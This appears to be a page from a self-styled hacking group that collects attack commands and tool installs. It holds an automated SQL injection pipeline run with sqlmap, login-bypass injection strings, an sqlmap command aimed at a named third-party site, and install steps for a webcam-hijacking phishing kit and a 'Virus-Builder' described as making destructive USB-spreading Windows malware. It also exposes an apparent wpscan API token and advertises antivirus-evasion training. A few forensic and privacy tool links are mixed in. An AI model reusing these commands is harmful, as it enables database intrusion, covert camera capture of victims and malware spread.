
VIPHACKER.100 Group
Topics
SQL injection automation v2 upgrade
commands: -- waybackurls viphacker100.free.nf | grep '=' | httpx --silent --status-code --json | jq -r '.[].url' | xargs -n 1 -I{} bash -c 'sqlmap -u "{}" -v 3 --random-agent --tamper="between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix="') AND 1=1-- -"'
improved command:
Common password list #passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Common-Credentials
INSTAGRAM Information Gathering tool link:-
#viphacker.100
INDIXEYE (Termux) #viphacker.100
apt-get update -y
apt-get upgrade -y
pkg install nodejs -y
pkg install git -y
Camera hacking commands #viphacker.100
git clone https://github.com/Debajyoti0-0/Webcam_Hijacking-CamPhish.git
cd Webcam_Hijacking-CamPhish
ls
chmod +x camphish.sh
bash camphish.sh
Information Gathering tool #viphacker.100
Simply execute the following command
sudo apt install python3-pip -y
cd Brahmastra
chmod +x *
The Virus-Builder :- The Virus-Builder tool is a sophisticated program designed to create destructive malware specifically targeting Windows operating systems. This tool allows users to customize and configure the virus to automatically execute when inserted into a USB drive, increasing the potential for spreading the malware to other systems.
Installation (Termux)
[+] git clone https://github.com/Cyber-Dioxide/Virus-Builder/
[+] cd Virus-Builder
[+] ls
[+] pip install -r requirements.txt
🔰 Antivirus course 🔰
🎉What You will Learn
Reverse Engineering
Malware Fud
How Antivirus Work
How Android Code Work
X-OSINT Features
IP Address information
gathering
Email Address
information gathering
Location MetaData
Android forensic:- https://github.com/nowsecure/android-forensics
wifi inspector:- https://wifi-inspector.en.softonic.com/android
PROXEY + FIREWALL = SAFE ON INTERNET:-https://github.com/Gedsh/InviZible
LINUX environment APP:- https://github.com/EXALAB/AnLinux-App
Free tool by Kali:- https://www.kali.org/tools/
Nethunter Rootless:- https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-project/-/tree/master/nethunter-rootless
X-TOOLKIT COMMAND
apt update && apt upgrade
pkg install git -y
git clone https://github.com/Whomrx666/X-toolkit
cd X-toolkit
chmod +x install.sh
Gmail account recovery link
Requirements
First name
Last name
Phone number
Gmail with link another gmail address
Termux
pkg update -y && pkg upgrade -y
termux-setup-storage
pkg install wget -y && pkg install figlet -y
wget https://github.com/AryanVBW/LinuxDroid/releases/download/scripts/LinuxDroidmenu.sh && chmod +x LinuxDroidmenu.sh
wget https://github.com/AryanVBW/LinuxDroid/releases/download/A1/default.bashrc && chmod +x default.bashrc
_login page bypass cod & query
foo' or '1'='1
Username : ' or ''='
Password : ' or ''='
Username : ' or 1--
Password :
Temporary RDP command (VIP)
fist create Google cloud console account
open terminal and paste this command
docker run -p 6070:80 dorowu/ubuntu-desktop-lxde-vnc
open web preview and change 6070
how to install ratdecoder
cd RATDecoders
pip3 install -r requirements.txt
python3 setup.py install
Using the supplied command line tool malconf you can pass in a single file or a directory with the -r flag and it will attempt to automagically detect the family and extract any config.
wpscanner commands + api token by VIP FOR linux
gem install wpscan
docker pull wpscanteam/wpscan
docker run -it --rm wpscanteam/wpscan --url https://example.com/ --enumerate u or
wpscan --url https://example.com --api-tokenWiWakSupjjMzZKZ1TrngOFbLHEFsXeLYIFuVCx2OCp8
SQLMAP commands
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
pip install -r requirements
python sqlmap.py -u http://www.example.com/?p=FUZZ --tables --random-agent --tamper=space2comment
OR
python sqlmap.py -u https://www.michaelkenna.com/gallery.php?id=60%27 --tables --random-agent --dbms=mysql --time-sec 5 --risk 1 --level 2 --no-cast --tamper=space2comment